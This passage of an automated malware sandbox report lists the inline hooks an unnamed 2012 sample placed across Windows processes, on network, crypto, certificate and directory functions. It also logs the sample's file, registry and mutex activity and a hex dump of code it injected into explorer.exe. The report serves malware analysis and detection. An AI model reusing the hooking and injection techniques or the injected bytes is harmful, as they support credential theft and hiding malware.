CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: jqs.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: jqs.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: jqs.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: jqs.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: jqs.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: lsass.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: lsass.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: lsass.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: lsass.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: lsass.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: msdtc.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: msdtc.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: msdtc.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: msdtc.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: dllhost.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: dllhost.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: dllhost.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: dllhost.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: alg.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: alg.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: alg.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: alg.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: wscntfy.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: wscntfy.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: wscntfy.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: spoolsv.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: spoolsv.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: spoolsv.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: spoolsv.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: spoolsv.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: msiexec.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: msiexec.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: msiexec.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: msiexec.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: MDM.EXE, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: MDM.EXE, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: MDM.EXE, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: WININET.dll
Function Name	Hook Type	New Data
InternetReadFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpOpenRequestA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestW	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetQueryDataAvailable	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetReadFileExA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpQueryInfoA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetWriteFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetQueryOptionA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpAddRequestHeadersA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetCloseHandle	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: explorer.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: explorer.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: explorer.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: explorer.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: explorer.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: explorer.exe, Module: WININET.dll
Function Name	Hook Type	New Data
HttpSendRequestA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestW	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetWriteFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetCloseHandle	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Analysis File: 7db482f5469dfeb0a6b2b4f66c062314.exe PID: 1780 Parent PID: 1760

Sections

General
Start time:	09:39:47
Start date:	24/01/2012
Path:	C:\7db482f5469dfeb0a6b2b4f66c062314.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x400000
File size:	178688 bytes
MD5 hash:	7DB482F5469DFEB0A6B2B4F66C062314

File Activities:

File created
File Path	Access	Attributes	Options	Completion	Count	Source Address	Symbol
C:\skhfushjflw\	read data or list directory and synchronize	normal	directory file and synchronous io non alert and open for backup ident	success or wait	1	330167	CreateDirectoryA

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	unknown	7C800000	1007616	own pid	read write	success or wait	1
unknown	query and write and read and execute and extend size	reserve	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	unknown	260000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	unknown	280000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	unknown	2D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	unknown	320000	24576	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey00000409	read	unknown	unknown	unknown	unknown	unknown	object name not found	1
\NLS\NlsSectionSortkey00000409	read	unknown	unknown	unknown	unknown	unknown	object name not found	1
unknown	query and write and read	commit	330000	16384	own pid	read write	success or wait	1

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address	Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName	ComputerName	success or wait	1	33075B	GetComputerNameA

Mutant Activities:

Mutant created
Name	Completion	Count	Source Address	Symbol
\BaseNamedObjects\ofjwkwufhdjfgki	success or wait	1	402EC3	CreateMutexA
\BaseNamedObjects\ofjwkwufhdjfgki	object name exists	1	40326C	CreateMutexA

Process Activities:

Process information queried
PID	Process info class	Completion	Count	Source Address	Symbol
1780	Cookie	success or wait	1	unknown	unknown
1780	ImageInformation	success or wait	1	unknown	unknown

Process terminated
PID	Filepath	Completion	Count	Source Address	Symbol
1780	C:\7db482f5469dfeb0a6b2b4f66c062314.exe	success or wait	1	4032A8	ExitProcess

Memory Activities:

Memory written
PID	Filepath	Base	Length	Value	Completion	Count	Source Address	Symbol
1552	C:\WINDOWS\explorer.exe	BA0000	4096	55 8B EC 81 EC C8 06 00 00 83 65 E0 00 53 56 57 33 C0 8D 7D E4 AB AB AB 8D 85 54 FF FF FF C7 45 B8 5C 3F 3F 5C C6 45 BC 00 89 85 50 FF FF FF E8 00 00 00 00 58 89 45 F8 8B 45 F8 8B D0 81 E2 FF 0F 00 00 33 C9 2B C2 41 05 20 0B 00 00 81 38 21 45 59 45 8B F8 89 7D C4 74 0B 41 05 00 10 00 00 83 F9 0A 76 E8 83 F9 0A 75 01 CC 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 E8 93 43 77 6A 01 8B F0 E8 36 04 00 00 59 59 85 C0 74 15 89 65 C0 68 04 01 00 00 8D 8D 44 FC FF FF 51 56 FF D0 8B 65 C0 68 AE B1 A6 C2 33 F6 56 E8 0E 04 00 00 59 59 3B C6 74 11 89 65 9C 8D 4D FF 51 56 6A 01 6A 14 FF D0 8B 65 9C 64 A1 18 00 00 00 68 77 35 07 0A 6A 01 89 70 34 E8 E2 03 00 00 59 59 3B C6 74 14 89 65 A4 56 8D 8F 08 01 00 00 51 FF D0 8B 65 A4 3B C6 75 13 64 A1 18 00 00 00 81 78 34	success or wait	1	40314C	unknown

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address	Symbol
1780	C:\7db482f5469dfeb0a6b2b4f66c062314.exe	330000	12FFAC	page execute and read and write	success or wait	1	402E49	unknown
1552	C:\WINDOWS\explorer.exe	BA0000	12FFAC	page execute and read and write	success or wait	1	403132	unknown

Memory attributes changed
PID	Filepath	Base	Length	New Protection	Old Protection	Completion	Count	Source Address	Symbol
1780	C:\7db482f5469dfeb0a6b2b4f66c062314.exe	400000	1000	page read and write	page readonly	success or wait	1	468116	VirtualProtect
1780	C:\7db482f5469dfeb0a6b2b4f66c062314.exe	400000	1000	page readonly	page read and write	success or wait	1	46812B	VirtualProtect
1780	C:\7db482f5469dfeb0a6b2b4f66c062314.exe	45115C	1000	page execute and read and write	page execute and read and write	success or wait	1	4027D0	unknown
1780	C:\7db482f5469dfeb0a6b2b4f66c062314.exe	464384	2000	page execute and read and write	page execute and read and write	success or wait	1	4027D0	unknown
1780	C:\7db482f5469dfeb0a6b2b4f66c062314.exe	463784	2000	page execute and read and write	page execute and read and write	success or wait	1	4027D0	unknown

System Activities:

System information queried
System info class	Completion	Count	Source Address	Symbol
ProcessInformation	success or wait	1	403027	CreateToolhelp32Snapshot

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	528723743
Process information queried	PID: 1780 Info Class: Cookie	success or wait	528729670
Section loaded	Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	528732083
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	528742777
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	528746825
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	528751058
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	528752455
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown	object name not found	528754547
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown	object name not found	528754913
Process information queried	PID: 1780 Info Class: ImageInformation	success or wait	528760429
Memory attributes changed	PID: 1780 Path: C:\7db482f5469dfeb0a6b2b4f66c062314.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page readonly	success or wait	528917111
